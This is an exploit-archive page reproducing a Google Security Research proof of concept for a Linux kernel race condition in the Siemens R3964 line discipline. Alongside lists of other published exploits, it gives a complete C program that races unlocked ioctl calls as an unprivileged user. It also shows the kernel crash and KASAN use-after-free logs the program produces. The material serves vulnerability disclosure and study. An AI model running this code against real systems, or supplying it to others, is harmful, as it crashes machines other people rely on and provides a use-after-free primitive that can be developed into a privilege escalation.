Menu

Improved exploit search engine. Try it out

"Linux - Missing Locking in Siemens R3964 Line Discipline Race Condition"

Author

"Google Security Research"

Platform

linux

Release date

2019-04-23

Release Date Title Type Platform Author
2019-05-08 "NetNumber Titan ENUM/DNS/NP 7.9.1 - Path Traversal / Authorization Bypass" webapps linux MobileNetworkSecurity
2019-05-08 "MiniFtp - 'parseconf_load_setting' Buffer Overflow" local linux strider
2019-05-03 "Blue Angel Software Suite - Command Execution" remote linux "Paolo Serracino_ Pietro Minniti_ Damiano Proietti"
2019-05-02 "Ruby On Rails - DoubleTap Development Mode secret_key_base Remote Code Execution (Metasploit)" remote linux Metasploit
2019-05-01 "CentOS Web Panel 0.9.8.793 (Free) / v0.9.8.753 (Pro) / 0.9.8.807 (Pro) - Domain Field (Add DNS Zone) Cross-Site Scripting" webapps linux DKM
2019-04-30 "Linux - Missing Locking Between ELF coredump code and userfaultfd VMA Modification" dos linux "Google Security Research"
2019-04-26 "systemd - DynamicUser can Create setuid Binaries when Assisted by Another Process" dos linux "Google Security Research"
2019-04-23 "Linux - 'page->_refcount' Overflow via FUSE" dos linux "Google Security Research"
2019-04-23 "Linux - Missing Locking in Siemens R3964 Line Discipline Race Condition" dos linux "Google Security Research"
2019-04-23 "systemd - Lack of Seat Verification in PAM Module Permits Spoofing Active Session to polkit" dos linux "Google Security Research"
2019-04-19 "SystemTap 1.3 - MODPROBE_OPTIONS Privilege Escalation (Metasploit)" local linux Metasploit
2019-04-12 "Zimbra Collaboration - Autodiscover Servlet XXE and ProxyServlet SSRF (Metasploit)" remote linux Metasploit
2019-04-08 "CentOS Web Panel 0.9.8.793 (Free) / 0.9.8.753 (Pro) - Cross-Site Scripting" webapps linux DKM
2019-04-08 "Apache 2.4.17 < 2.4.38 - 'apache2ctl graceful' 'logrotate' Local Privilege Escalation" local linux cfreal
2019-03-29 "CentOS Web Panel 0.9.8.789 - NameServer Field Persistent Cross-Site Scripting" webapps linux DKM
2019-03-28 "gnutls 3.6.6 - 'verify_crt()' Use-After-Free" dos linux "Google Security Research"
2019-03-22 "snap - seccomp BBlacklist for TIOCSTI can be Circumvented" dos linux "Google Security Research"
2019-03-19 "libseccomp < 2.4.0 - Incorrect Compilation of Arithmetic Comparisons" dos linux "Google Security Research"
2019-03-11 "Linux Kernel 4.4 (Ubuntu 16.04) - 'snd_timer_user_ccallback()' Kernel Pointer Leak" dos linux wally0813
2019-03-07 "Imperva SecureSphere 13.x - 'PWS' Command Injection (Metasploit)" remote linux Metasploit
2019-03-06 "Linux < 4.20.14 - Virtual Address 0 is Mappable via Privileged write() to /proc/*/mem" dos linux "Google Security Research"
2019-03-04 "FileZilla 3.40.0 - 'Local search' / 'Local site' Denial of Service (PoC)" dos linux "Mr Winst0n"
2019-03-01 "Linux < 4.14.103 / < 4.19.25 - Out-of-Bounds Read and Write in SNMP NAT Module" dos linux "Google Security Research"
2019-02-28 "Usermin 1.750 - Remote Command Execution (Metasploit)" webapps linux AkkuS
2019-02-28 "WebKitGTK 2.23.90 / WebKitGTK+ 2.22.6 - Denial of Service" dos linux "Dhiraj Mishra"
2019-02-22 "Micro Focus Filr 3.4.0.217 - Path Traversal / Local Privilege Escalation" webapps linux SecureAuth
2019-02-20 "MatrixSSL < 4.0.2 - Stack Buffer Overflow Verifying x.509 Certificates" dos linux "Google Security Research"
2019-02-21 "Valentina Studio 9.0.5 Linux - 'Host' Buffer Overflow (PoC)" dos linux "Alejandra Sánchez"
2019-02-13 "runc < 1.0-rc6 (Docker < 18.09.2) - Container Breakout (2)" local linux embargo
2019-02-15 "Linux - 'kvm_ioctl_create_device()' NULL Pointer Dereference" dos linux "Google Security Research"
Release Date Title Type Platform Author
2019-05-23 "Microsoft Windows 10 1809 - 'CmKeyBodyRemapToVirtualForEnum' Arbitrary Key Enumeration Privilege Escalation" local windows "Google Security Research"
2019-05-23 "Visual Voicemail for iPhone - IMAP NAMESPACE Processing Use-After-Free" dos ios "Google Security Research"
2019-05-21 "Apple macOS < 10.14.5 / iOS < 12.3 XNU - 'in6_pcbdetach' Stale Pointer Use-After-Free" dos multiple "Google Security Research"
2019-05-21 "Apple macOS < 10.14.5 / iOS < 12.3 XNU - Wild-read due to bad cast in stf_ioctl" dos multiple "Google Security Research"
2019-05-21 "Apple macOS < 10.14.5 / iOS < 12.3 JavaScriptCore - AIR Optimization Incorrectly Removes Assignment to Register" dos multiple "Google Security Research"
2019-05-21 "Apple macOS < 10.14.5 / iOS < 12.3 JavaScriptCore - Loop-Invariant Code Motion (LICM) in DFG JIT Leaves Stack Variable Uninitialized" dos multiple "Google Security Research"
2019-05-21 "Apple macOS < 10.14.5 / iOS < 12.3 DFG JIT Compiler - 'HasIndexedProperty' Use-After-Free" dos multiple "Google Security Research"
2019-05-13 "Google Chrome V8 - Turbofan JSCallReducer::ReduceArrayIndexOfIncludes Out-of-Bounds Read/Write" dos multiple "Google Security Research"
2019-04-30 "Linux - Missing Locking Between ELF coredump code and userfaultfd VMA Modification" dos linux "Google Security Research"
2019-04-26 "systemd - DynamicUser can Create setuid Binaries when Assisted by Another Process" dos linux "Google Security Research"
2019-04-24 "Google Chrome 72.0.3626.121 / 74.0.3725.0 - 'NewFixedDoubleArray' Integer Overflow" remote multiple "Google Security Research"
2019-04-24 "VirtualBox 6.0.4 r128413 - COM RPC Interface Code Injection Host Privilege Escalation" local windows "Google Security Research"
2019-04-23 "Linux - 'page->_refcount' Overflow via FUSE" dos linux "Google Security Research"
2019-04-23 "Linux - Missing Locking in Siemens R3964 Line Discipline Race Condition" dos linux "Google Security Research"
2019-04-23 "systemd - Lack of Seat Verification in PAM Module Permits Spoofing Active Session to polkit" dos linux "Google Security Research"
2019-04-17 "Oracle Java Runtime Environment - Heap Corruption During TTF font Rendering in GlyphIterator::setCurrGlyphID" dos multiple "Google Security Research"
2019-04-17 "Oracle Java Runtime Environment - Heap Corruption During TTF font Rendering in sc_FindExtrema4" dos multiple "Google Security Research"
2019-04-16 "Microsoft Windows 10 1809 - LUAFV PostLuafvPostReadWrite SECTION_OBJECT_POINTERS Race Condition Privilege Escalation" local windows "Google Security Research"
2019-04-16 "Microsoft Windows 10 1809 - LUAFV Delayed Virtualization Cache Manager Poisoning Privilege Escalation" local windows "Google Security Research"
2019-04-16 "Microsoft Windows 10 1809 - LUAFV NtSetCachedSigningLevel Device Guard Bypass" local windows "Google Security Research"
2019-04-16 "Microsoft Windows 10 1809 - LUAFV LuafvCopyShortName Arbitrary Short Name Privilege Escalation" local windows "Google Security Research"
2019-04-16 "Microsoft Windows 10 1809 - LUAFV Delayed Virtualization Cross Process Handle Duplication Privilege Escalation" local windows "Google Security Research"
2019-04-16 "Microsoft Windows 10 1809 - LUAFV Delayed Virtualization MAXIMUM_ACCESS DesiredAccess Privilege Escalation" local windows "Google Security Research"
2019-04-16 "Microsoft Windows 10 1809 / 1709 - CSRSS SxSSrv Cached Manifest Privilege Escalation" local windows "Google Security Research"
2019-04-03 "Google Chrome 72.0.3626.96 / 74.0.3702.0 - 'JSPromise::TriggerPromiseReactions' Type Confusion" remote multiple "Google Security Research"
2019-04-03 "Google Chrome 73.0.3683.39 / Chromium 74.0.3712.0 - 'ReadableStream' Internal Object Leak Type Confusion" dos multiple "Google Security Research"
2019-04-03 "Google Chrome 72.0.3626.81 - 'V8TrustedTypePolicyOptions::ToImpl' Type Confusion" dos multiple "Google Security Research"
2019-04-03 "WebKitGTK+ - 'ThreadedCompositor' Race Condition" dos multiple "Google Security Research"
2019-04-03 "WebKit JavaScriptCore - CodeBlock Dangling Watchpoints Use-After-Free" dos multiple "Google Security Research"
2019-04-03 "WebKit JavaScriptCore - Out-Of-Bounds Access in FTL JIT due to LICM Moving Array Access Before the Bounds Check" dos multiple "Google Security Research"
import requests
response = requests.get('https://www.nmmapper.com/api/exploitdetails/46744/?format=json')
                                                {"url": "https://www.nmmapper.com/api/exploitdetails/46744/?format=json", "download_file": "https://www.nmmapper.com/st/exploitdetails/46744/41183/linux-missing-locking-in-siemens-r3964-line-discipline-race-condition/download/", "exploit_id": "46744", "exploit_description": "\"Linux - Missing Locking in Siemens R3964 Line Discipline Race Condition\"", "exploit_date": "2019-04-23", "exploit_author": "\"Google Security Research\"", "exploit_type": "dos", "exploit_platform": "linux", "exploit_port": null}
                                            

For full documentation follow the link above

Browse exploit DB API Browse

  1
  2
  3
  4
  5
  6
  7
  8
  9
 10
 11
 12
 13
 14
 15
 16
 17
 18
 19
 20
 21
 22
 23
 24
 25
 26
 27
 28
 29
 30
 31
 32
 33
 34
 35
 36
 37
 38
 39
 40
 41
 42
 43
 44
 45
 46
 47
 48
 49
 50
 51
 52
 53
 54
 55
 56
 57
 58
 59
 60
 61
 62
 63
 64
 65
 66
 67
 68
 69
 70
 71
 72
 73
 74
 75
 76
 77
 78
 79
 80
 81
 82
 83
 84
 85
 86
 87
 88
 89
 90
 91
 92
 93
 94
 95
 96
 97
 98
 99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
/*
The Siemens R3964 line discipline code in drivers/tty/n_r3964.c has a few races
around its ioctl handler; for example, the handler for R3964_ENABLE_SIGNALS
just allocates and deletes elements in a linked list with zero locking.
This code is reachable by an unprivileged user if the line discipline is enabled
in the kernel config; Ubuntu 18.04, for example, ships this line discipline as a
module.

Proof of concept:

==================================
user@ubuntu-18-04-vm:~/r3964$ cat r3964_racer.c
*/

#define _GNU_SOURCE
#include <pthread.h>
#include <fcntl.h>
#include <sys/ioctl.h>
#include <stdio.h>
#include <err.h>
#include <stdlib.h>
#include <linux/n_r3964.h>

static int ptm_fd, slave_fd;

static void *thread_fn(void *dummy) {
  int res;
  while (1) {
    res = ioctl(slave_fd, R3964_ENABLE_SIGNALS, R3964_SIG_ALL);
    printf("R3964_ENABLE_SIGNALS: %d\n", res);
    res = ioctl(slave_fd, R3964_ENABLE_SIGNALS, 0);
    printf("R3964_ENABLE_SIGNALS: %d\n", res);
  }
}

int main(void) {
  ptm_fd = getpt();
  if (ptm_fd == -1) err(1, "getpt");
  if (unlockpt(ptm_fd)) err(1, "unlockpt");
  slave_fd = ioctl(ptm_fd, TIOCGPTPEER, O_RDWR);
  if (slave_fd == -1) err(1, "TIOCGPTPEER");

  printf("-----------------------------------------\n");
  system("ls -l /proc/$PPID/fd");
  printf("-----------------------------------------\n");

  const int disc_r3964 = N_R3964;
  if (ioctl(slave_fd, TIOCSETD, &disc_r3964)) err(1, "TIOCSETD");

  pthread_t thread;
  if (pthread_create(&thread, NULL, thread_fn, NULL)) errx(1, "pthread_create");

  thread_fn(NULL);

  return 0;
}

/*
user@ubuntu-18-04-vm:~/r3964$ gcc -o r3964_racer r3964_racer.c -pthread && ./r3964_racer
[...]
==================================

dmesg splat:

==================================
[   82.646953] r3964: Philips r3964 Driver $Revision: 1.10 $
[   82.656459] ------------[ cut here ]------------
[   82.656461] kernel BUG at /build/linux-Y38gIP/linux-4.15.0/mm/slub.c:296!
[   82.658396] invalid opcode: 0000 [#1] SMP PTI
[   82.659515] Modules linked in: n_r3964 joydev ipt_MASQUERADE nf_nat_masquerade_ipv4 nf_conntrack_netlink nfnetlink xfrm_user xfrm_algo iptable_nat nf_conntrack_ipv4 nf_defrag_ipv4 nf_nat_ipv4 xt_addrtype iptable_filter xt_conntrack nf_nat nf_conntrack libcrc32c br_netfilter bridge stp llc aufs overlay snd_hda_codec_generic crct10dif_pclmul crc32_pclmul snd_hda_intel snd_hda_codec snd_hda_core snd_hwdep ghash_clmulni_intel snd_pcm snd_seq_midi snd_seq_midi_event pcbc aesni_intel aes_x86_64 snd_rawmidi snd_seq snd_seq_device snd_timer snd crypto_simd glue_helper cryptd input_leds soundcore mac_hid 9pnet_virtio 9pnet serio_raw qemu_fw_cfg sch_fq_codel parport_pc ppdev lp parport ip_tables x_tables autofs4 virtio_gpu ttm floppy drm_kms_helper psmouse syscopyarea sysfillrect sysimgblt fb_sys_fops drm
[   82.677770]  virtio_net i2c_piix4 pata_acpi
[   82.678849] CPU: 1 PID: 2209 Comm: r3964_racer Not tainted 4.15.0-42-generic #45-Ubuntu
[   82.680897] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.10.2-1 04/01/2014
[   82.683098] RIP: 0010:kfree+0x16a/0x180
[   82.684116] RSP: 0018:ffffb6b381d7fd50 EFLAGS: 00010246
[   82.685454] RAX: ffff9bb0b4770000 RBX: ffff9bb0b4770000 RCX: ffff9bb0b4770000
[   82.687285] RDX: 0000000000006e86 RSI: ffff9bb1bfca70a0 RDI: ffff9bb1bb003800
[   82.689247] RBP: ffffb6b381d7fd68 R08: ffffffffc0511db0 R09: ffffffffc051202c
[   82.691077] R10: ffffeb8c80d1dc00 R11: 0000000000000000 R12: ffff9bb1b3430e40
[   82.692906] R13: ffffffffc051202c R14: ffff9bb13b56e800 R15: ffff9bb12d1addd0
[   82.694726] FS:  00007ff9b92da740(0000) GS:ffff9bb1bfc80000(0000) knlGS:0000000000000000
[   82.696801] CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033
[   82.698421] CR2: 0000558cf9e32ec8 CR3: 00000000a513a005 CR4: 00000000003606e0
[   82.700259] DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000
[   82.702113] DR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 0000000000000400
[   82.703946] Call Trace:
[   82.704602]  r3964_ioctl+0x27c/0x2b0 [n_r3964]
[   82.705746]  tty_ioctl+0x138/0x8c0
[   82.706631]  ? __wake_up+0x13/0x20
[   82.707516]  do_vfs_ioctl+0xa8/0x630
[   82.708610]  ? vfs_write+0x166/0x1a0
[   82.709543]  SyS_ioctl+0x79/0x90
[   82.710405]  do_syscall_64+0x73/0x130
[   82.711357]  entry_SYSCALL_64_after_hwframe+0x3d/0xa2
[   82.712659] RIP: 0033:0x7ff9b8bd45d7
[   82.713680] RSP: 002b:00007fffcd85bcf8 EFLAGS: 00000202 ORIG_RAX: 0000000000000010
[   82.715617] RAX: ffffffffffffffda RBX: 0000000000000000 RCX: 00007ff9b8bd45d7
[   82.717463] RDX: 0000000000000000 RSI: 0000000000005301 RDI: 0000000000000004
[   82.719411] RBP: 00007fffcd85bd20 R08: 0000000000000000 R09: 0000000000000000
[   82.721248] R10: 0000000000000000 R11: 0000000000000202 R12: 0000556df58ed820
[   82.723093] R13: 00007fffcd85be30 R14: 0000000000000000 R15: 0000000000000000
[   82.724930] Code: c4 80 74 04 41 8b 72 6c 4c 89 d7 e8 61 1c f9 ff eb 86 41 b8 01 00 00 00 48 89 d9 48 89 da 4c 89 d6 e8 8b f6 ff ff e9 6d ff ff ff <0f> 0b 48 8b 3d 6d c5 1c 01 e9 c9 fe ff ff 0f 1f 84 00 00 00 00 
[   82.729909] RIP: kfree+0x16a/0x180 RSP: ffffb6b381d7fd50
[   82.731310] ---[ end trace c1cd537c5d2e0b84 ]---
==================================


I've also tried this on 5.0-rc2 with KASAN on, which resulted in this splat:

==================================
[   69.883056] ==================================================================
[   69.885163] BUG: KASAN: use-after-free in r3964_ioctl+0x288/0x3c0
[   69.886855] Read of size 8 at addr ffff8881e0474020 by task r3964_racer/1134
[   69.888820] 
[   69.889251] CPU: 3 PID: 1134 Comm: r3964_racer Not tainted 5.0.0-rc2 #238
[   69.891729] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.10.2-1 04/01/2014
[   69.894535] Call Trace:
[   69.895223]  dump_stack+0x71/0xab
[   69.896134]  ? r3964_ioctl+0x288/0x3c0
[   69.897181]  print_address_description+0x6a/0x270
[   69.898473]  ? r3964_ioctl+0x288/0x3c0
[   69.899499]  ? r3964_ioctl+0x288/0x3c0
[   69.900534]  kasan_report+0x14e/0x192
[   69.901562]  ? r3964_ioctl+0x288/0x3c0
[   69.902606]  r3964_ioctl+0x288/0x3c0
[   69.903586]  tty_ioctl+0x227/0xbd0
[...]
[   69.917312]  do_vfs_ioctl+0x134/0x8f0
[...]
[   69.926807]  ksys_ioctl+0x70/0x80
[   69.927709]  __x64_sys_ioctl+0x3d/0x50
[   69.928734]  do_syscall_64+0x73/0x160
[   69.929741]  entry_SYSCALL_64_after_hwframe+0x44/0xa9
[   69.931099] RIP: 0033:0x7f6491542dd7
[   69.932068] Code: 00 00 00 48 8b 05 c1 80 2b 00 64 c7 00 26 00 00 00 48 c7 c0 ff ff ff ff c3 66 2e 0f 1f 84 00 00 00 00 00 b8 10 00 00 00 0f 05 <48> 3d 01 f0 ff ff 73 01 c3 48 8b 0d 91 80 2b 00 f7 d8 64 89 01 48
[   69.937051] RSP: 002b:00007f6491460f28 EFLAGS: 00000206 ORIG_RAX: 0000000000000010
[   69.939067] RAX: ffffffffffffffda RBX: 0000000000000000 RCX: 00007f6491542dd7
[   69.940977] RDX: 000000000000000f RSI: 0000000000005301 RDI: 0000000000000004
[   69.942905] RBP: 00007f6491460f50 R08: 0000000000000000 R09: 0000000000000018
[   69.944800] R10: 0000000000000064 R11: 0000000000000206 R12: 0000000000000000
[   69.947600] R13: 00007ffeb17a9b4f R14: 0000000000000000 R15: 00007f6491c42040
[   69.949491] 
[   69.949923] Allocated by task 1131:
[   69.950866]  __kasan_kmalloc.constprop.8+0xa5/0xd0
[   69.952147]  kmem_cache_alloc_trace+0xfa/0x200
[   69.953352]  r3964_ioctl+0x2e6/0x3c0
[   69.954333]  tty_ioctl+0x227/0xbd0
[   69.955267]  do_vfs_ioctl+0x134/0x8f0
[   69.956248]  ksys_ioctl+0x70/0x80
[   69.957150]  __x64_sys_ioctl+0x3d/0x50
[   69.958169]  do_syscall_64+0x73/0x160
[   69.959148]  entry_SYSCALL_64_after_hwframe+0x44/0xa9
[   69.960485] 
[   69.960910] Freed by task 1131:
[   69.961764]  __kasan_slab_free+0x135/0x180
[   69.962851]  kfree+0x90/0x1d0
[   69.963660]  r3964_ioctl+0x208/0x3c0
[   69.964631]  tty_ioctl+0x227/0xbd0
[   69.965564]  do_vfs_ioctl+0x134/0x8f0
[   69.966540]  ksys_ioctl+0x70/0x80
[   69.967424]  __x64_sys_ioctl+0x3d/0x50
[   69.968424]  do_syscall_64+0x73/0x160
[   69.969414]  entry_SYSCALL_64_after_hwframe+0x44/0xa9
[   69.970768] 
[   69.971182] The buggy address belongs to the object at ffff8881e0474008
[   69.971182]  which belongs to the cache kmalloc-64 of size 64
[   69.974429] The buggy address is located 24 bytes inside of
[   69.974429]  64-byte region [ffff8881e0474008, ffff8881e0474048)
[   69.977470] The buggy address belongs to the page:
[   69.978744] page:ffffea0007811d00 count:1 mapcount:0 mapping:ffff8881e600f740 index:0x0 compound_mapcount: 0
[   69.981316] flags: 0x17fffc000010200(slab|head)
[   69.982528] raw: 017fffc000010200 ffffea0007554508 ffffea0007811e08 ffff8881e600f740
[   69.984722] raw: 0000000000000000 0000000000270027 00000001ffffffff 0000000000000000
[   69.984723] page dumped because: kasan: bad access detected
[   69.984724] 
[   69.984725] Memory state around the buggy address:
[   69.984727]  ffff8881e0473f00: fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc
[   69.984729]  ffff8881e0473f80: fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc
[   69.984731] >ffff8881e0474000: fc fb fb fb fb fb fb fb fb fc fc fc fc fc fc fc
[   69.984732]                                ^
[   69.984734]  ffff8881e0474080: fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc
[   69.984736]  ffff8881e0474100: fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc
[   69.984737] ==================================================================
[   69.984739] Disabling lock debugging due to kernel taint
[   69.996233] ==================================================================
==================================


I wonder whether it would, in addition to fixing the locking, also make sense to
gate the line discipline on some sort of capability - it seems wrong to me that
this kind of code is exposed to every user on the system.
*/